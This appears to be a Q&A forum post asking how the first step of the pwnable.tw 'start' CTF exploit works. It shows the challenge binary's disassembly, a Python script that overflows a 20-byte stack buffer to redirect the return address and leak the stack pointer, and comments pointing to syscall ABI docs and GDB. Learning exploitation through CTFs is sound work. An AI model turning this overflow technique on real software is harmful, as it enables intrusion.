# Exploiting system calls in assembly

Tags: python, security, assembly, x86, exploit

I'm attempting to solve [pwnable.tw's start challenge](https://pwnable.tw/challenge/#1) to learn a bit more about exploits. The provided dissassembled binary looks like this:

```
start:     file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060:   54                      push   esp
 8048061:   68 9d 80 04 08          push   0x804809d
 8048066:   31 c0                   xor    eax,eax
 8048068:   31 db                   xor    ebx,ebx
 804806a:   31 c9                   xor    ecx,ecx
 804806c:   31 d2                   xor    edx,edx
 804806e:   68 43 54 46 3a          push   0x3a465443
 8048073:   68 74 68 65 20          push   0x20656874
 8048078:   68 61 72 74 20          push   0x20747261
 804807d:   68 73 20 73 74          push   0x74732073
 8048082:   68 4c 65 74 27          push   0x2774654c
 8048087:   89 e1                   mov    ecx,esp ; buffer = $esp
 8048089:   b2 14                   mov    dl,0x14 ; count = 0x14 (20)
 804808b:   b3 01                   mov    bl,0x1  ; fd = 1 (stdout)
 804808d:   b0 04                   mov    al,0x4  ; system call = 4 (sys_write)
 804808f:   cd 80                   int    0x80    ; call sys_write(1, $esp, 20)
 8048091:   31 db                   xor    ebx,ebx ; fd = 0 (stdin)
 8048093:   b2 3c                   mov    dl,0x3c ; count = 0x36 (60)
 8048095:   b0 03                   mov    al,0x3  ; system call = 3 (sys_read)
 8048097:   cd 80                   int    0x80    ; sys_read(0, ecx/$esp, 60)
 8048099:   83 c4 14                add    esp,0x14
 804809c:   c3                      ret    

0804809d <_exit>:
 804809d:   5c                      pop    esp
 804809e:   31 c0                   xor    eax,eax
 80480a0:   40                      inc    eax
```

Several writeups ([1](https://tuonilabs.wordpress.com/2017/09/30/pwnable-tw-write-up/), [2](https://abda.nl/posts/2018/05/pwnable.tw-ctf-start/), and [3](https://github.com/shinmao/PWNABLE.TW-write-ups/tree/master/start)) point out that the solution lies in leaking the `esp` address that was moved into `ecx` by exploiting the count values on `sys_write` and `sys_read`. This way, we can force the return address to `0x8048087` so that the program will loop and print the content of `esp`.

However, I do not understand how this really works. What exactly do the system calls do to registers and how does that change the return address? Why does the below exploit work?

```
from socket import *
from struct import *

c = socket(AF_INET, SOCK_STREAM)
c.connect(('chall.pwnable.tw', 10000))

# leak esp
c.send('x' * 20 + pack('<I', 0x08048087))
esp = unpack('<I', c.recv(0x100)[:4])[0]
print 'esp = {0:08x}'.format(esp)
```

I believe a step-by-step walkthrough that displays per-step register values could really help clarify the problem.

Comment: [What are the calling conventions for UNIX & Linux system calls on i386 and x86-64](//stackoverflow.com/q/2535989) explains how the ABI works: ebx, ecx, edx, ... are passed (by the kernel) to its internal `sys_write` function which implements the Linux/POSIX `write(fd, buf, len)` system call.  See [What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code?](//stackoverflow.com/q/46087730) for more about the kernel side of things, how Linux collects args and dispatches to a function pointer based on the call number in EAX.

Comment: Re: your last paragraph: you're asking someone to single-step this program in GDB for you and write down the results?  If you think that would be a useful answer, why not do it yourself?  GDB's `layout reg` should prove useful for watching register values change.  See the bottom of https://stackoverflow.com/tags/x86/info for GDB tips.

Comment: @PeterCordes because I didn't know GDB could do this. Thanks for the tips, I'll  post an answer if I succeed.